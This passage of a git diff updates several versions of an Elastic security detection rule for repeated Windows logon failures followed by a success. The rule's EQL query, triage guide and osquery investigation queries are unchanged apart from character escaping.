contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where host.os.type == \"windows\" and event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json index 4f75c496f4a..d8b0e8a9c10 100644 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_5.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where host.os.type == \"windows\" and event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json index 9c84813c730..66aec9e9193 100644 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_6.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json index 28d82a13225..7918f289694 100644 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + 